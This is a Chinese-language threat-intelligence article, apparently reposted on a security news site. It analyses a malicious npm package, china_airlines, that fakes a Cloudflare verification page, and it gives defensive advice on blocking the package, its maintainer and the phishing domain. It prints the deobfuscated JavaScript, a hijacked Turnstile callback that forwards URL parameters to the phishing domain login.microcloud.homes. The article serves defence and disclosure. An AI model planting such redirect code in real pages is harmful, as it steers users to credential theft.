Npm恶意包china_airlines伪装Cloudflare页面,定向钓鱼窃取用户凭证

admin 2026-07-13 05:32:27 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: npm恶意包china_airlines伪装Cloudflare验证页面进行定向钓鱼。该包利用混淆JS劫持回调,将用户跳转至钓鱼站点窃取凭证,供应链风险显著。建议企业封禁该包及维护者,利用WAF拦截关联域名,并加强第三方包引入的安全审计与开发者培训,防范批量数据泄露。 综合评分: 84 文章分类: 威胁情报,供应链安全,社会工程学,恶意软件,数据泄露


cover_image

Npm 恶意包 china_airlines 伪装 Cloudflare 页面,定向钓鱼窃取用户凭证

原创

Z Z

威胁情报Z分析

2026年7月12日 09:39 海南

在小说阅读器读本章

去阅读

一、事件概述

近日,npm 平台出现一款名为 china_airlines(版本 1.0.0)的新型恶意包,该包于 2026 年 7 月 2 日首次发布,无任何合法依赖,仅包含伪装成 Cloudflare 人机验证页面的恶意 HTML 与混淆 JavaScript 代码。攻击者通过冒用知名航空公司品牌进行社会工程学诱导,最终将用户跳转至钓鱼站点 login.microcloud.homes,意图窃取敏感登录凭证。

二、样本技术分析

  1. 包基本信息
  • 包名:china_airlines
  • 版本:1.0.0
  • 维护者:henryp52uflores
  • 发布时间:2026-07-02
  • 体积:25 KB(仅包含 2 个文件)
  • 特征:无声明依赖,周下载量数据不可用,属于典型 “一次性” 恶意分发包。
  1. 伪装页面与混淆脚本

恶意包核心为一个仿 Cloudflare 安全验证页面的 HTML 文件,页面底部嵌入高度混淆的 JavaScript 代码,通过十六进制变量名与字符串拆分实现反分析。经反混淆还原后,核心逻辑仅 7 行:

function onTurnstileComplete(token) {  const targetUrl = new URL("https://login.microcloud.homes/");  new URLSearchParams(window.location.search).forEach((_0x8ebd52, _0x5d14e5) => {    targetUrl.searchParams.append(_0x5d14e5, _0x8ebd52);  });  window.location.replace(targetUrl.toString());}

  • 脚本劫持 Cloudflare Turnstile 验证完成回调,将用户当前页面的所有 URL 参数拼接后,强制跳转至钓鱼域名 login.microcloud.homes。

  • 伪装页面包含动态生成的 Ray ID 与 Cloudflare 品牌标识,极具迷惑性,易让用户误以为是正常安全验证流程。

  1. 攻击链路

  2. 分发阶段:攻击者将恶意包上传至 npm,利用 china_airlines(中华航空)这一知名品牌名称,诱导开发者或用户下载安装。

  3. 加载阶段:用户执行包内代码后,浏览器加载仿 Cloudflare 验证页面,完成人机验证。

  4. 跳转阶段:验证完成后,混淆脚本触发,将用户无感知跳转至钓鱼站点 login.microcloud.homes。

  5. 窃取阶段:钓鱼站点伪装成目标服务登录页,诱导用户输入账号密码等敏感信息,完成凭证窃取。

三、威胁影响与风险评估

社会工程学风险:冒用航空公司品牌名称,结合 Cloudflare 验证页面伪装,大幅提升用户信任度,钓鱼成功率极高。

凭证窃取风险:最终跳转的钓鱼站点 login.microcloud.homes 大概率为仿冒登录页面,可直接窃取用户账号、密码、二次验证码等核心敏感信息。

供应链风险:npm 平台作为主流前端包管理仓库,该恶意包若被误引入项目,将导致企业级应用用户批量暴露于钓鱼风险。

四、处置建议

  1. 终端用户防护

警惕来源不明的 npm 包,尤其是近期发布、下载量极低且无依赖的包。

访问登录页面时,仔细核对域名真实性,避免点击自动跳转的陌生链接。

开启浏览器域名高亮与安全提示功能,及时识别钓鱼站点。

  1. 企业安全运营

在 npm 镜像或私有仓库中添加拦截规则,封禁 china_airlines 及维护者 henryp52uflores 相关包。

部署 WAF/EDR 设备,添加对 login.microcloud.homes 域名的访问拦截规则。

开展开发者安全培训,强调 npm 包安全审计与供应链风险意识。

  1. 平台方处置

建议 npm 平台对 china_airlines 包执行下架处理,并对维护者 henryp52uflores 账号进行风险排查。

加强对冒用知名品牌名称的新包审核力度,提升恶意包前置识别能力。

五、总结

本次 china_airlines 恶意包事件是典型的npm 供应链钓鱼攻击,攻击者通过品牌冒用与页面伪装,降低用户警惕性,最终实现凭证窃取。安全团队需持续关注 npm 平台新型恶意包分发趋势,加强供应链安全管控,避免此类攻击造成企业与用户数据泄露。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:威胁情报Z分析 Z Z《Npm 恶意包 china_airlines 伪装 Cloudflare 页面,定向钓鱼窃取用户凭证》

正规Ai 网络安全文章

正规Ai

文章总结: 文档来自正规AiKhan安全团队,发布于2026年7月12日,内容仅包含标题和图片占位符,无实质技术分析或可操作建议,可能为广告或推广。 综合评分:
评论:0   参与:  0